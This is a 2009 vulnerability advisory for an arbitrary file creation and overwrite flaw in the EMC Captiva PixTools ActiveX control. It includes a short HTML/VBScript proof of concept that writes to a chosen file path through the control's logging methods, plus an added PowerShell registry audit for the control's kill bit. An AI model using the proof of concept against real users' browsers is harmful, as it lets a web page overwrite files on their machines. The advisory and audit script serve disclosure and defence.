EMC Captiva ISIS PixTools (PixTools 2.2 Distributed Imaging) Arbitrary File Creation/Overwrite

2009.10.08
Credit: shinnai
Risk: High
Local: No
Remote: Yes


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<pre><code>
<body bgcolor="#E0E0E0">
------------------------------------------------------------------------------------------------
<b>EMC Captiva ISIS PixTools (PixTools 2.2 Distributed Imaging) Arbitrary File Creation/Overwrite</b>
url: http://www.emc.com/products/detail/software/pixtools.htm

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/

targetFile = "C:\Program Files\EMC Captiva\PDI\Client\PDIControl.dll"
version = 2.2.3160.0
progid = "PDIControlLib.PDI"

Marked as =
RegKey Safe for Script: <font color = "green"><b>True</b></font>
RegKey Safe for Init: <font color = "green"><b>True</b></font>
Implements IObjectSafety: <font color = "red"><b>False</b></font>

<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>

Tested on:
Windows XP Professional SP3 with Internet Explorer 8
Windows Server 2003 SP2 with Internet Explorer 8
------------------------------------------------------------------------------------------------
<object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
  test.SetLogLevel 1
  test.SetLogFileName "c:\some.txt"
  test.WriteToLog 1, "Hello World!"
 End Sub
</script>
</code></pre>
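The advisory's "Marked as" fields are registry markings, so a host can be audited for them. The following PowerShell is an added example, not part of the advisory or of EMC's software: it checks whether the CLSID above is registered, whether it carries the safe-for-scripting and safe-for-initialization categories, and whether an Internet Explorer kill bit is set. The function name `Get-ActiveXExposure` and the output field names are hypothetical, and only machine-wide (HKLM) registrations are checked.

```powershell
# Added example, not from the advisory: audit one host for the control it names.
$Clsid            = '{00200338-3D33-4FFC-AC20-67AA234325F3}'  # classid on the page
$SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForScripting
$SafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForInitializing
$KillBit          = 0x400                                     # kill bit in "Compatibility Flags"

function Get-ActiveXExposure {   # hypothetical helper name
    param([Parameter(Mandatory)][string]$Clsid)

    # A 32-bit control on 64-bit Windows registers under WOW6432Node,
    # so both registry views are checked.
    $views = @(
        @{ View = 'native'; Root = 'HKLM:\SOFTWARE' },
        @{ View = 'wow64';  Root = 'HKLM:\SOFTWARE\WOW6432Node' }
    )
    foreach ($v in $views) {
        $classKey  = "$($v.Root)\Classes\CLSID\$Clsid"
        $compatKey = "$($v.Root)\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        if (-not (Test-Path -LiteralPath $classKey)) { continue }   # not registered in this view

        # Path of the DLL that implements the control
        $server = (Get-ItemProperty -LiteralPath "$classKey\InprocServer32" `
                   -ErrorAction SilentlyContinue).'(default)'
        # The kill bit stops Internet Explorer from instantiating the control
        $flags  = (Get-ItemProperty -LiteralPath $compatKey `
                   -ErrorAction SilentlyContinue).'Compatibility Flags'
        $killed = ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
        # Category keys corresponding to "RegKey Safe for Script" / "RegKey Safe for Init"
        $sfs = Test-Path -LiteralPath "$classKey\Implemented Categories\$SafeForScripting"
        $sfi = Test-Path -LiteralPath "$classKey\Implemented Categories\$SafeForInit"

        [pscustomobject]@{
            View              = $v.View
            Server            = $server
            SafeForScripting  = $sfs
            SafeForInit       = $sfi
            KillBitSet        = $killed
            # Marked safe for scripting and not kill-bitted: pages can script it
            ScriptableFromWeb = $sfs -and (-not $killed)
        }
    }
}

Get-ActiveXExposure -Clsid $Clsid | Format-List
```

No output means the control is not registered machine-wide on that host.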

References:

http://xforce.iss.net/xforce/xfdb/53555
http://www.vupen.com/english/advisories/2009/2808
http://www.shinnai.net/xplits/TXT_17zVMhRhsRE6qC6DAj52.html
http://www.securityfocus.com/bid/36566
http://secunia.com/advisories/36896

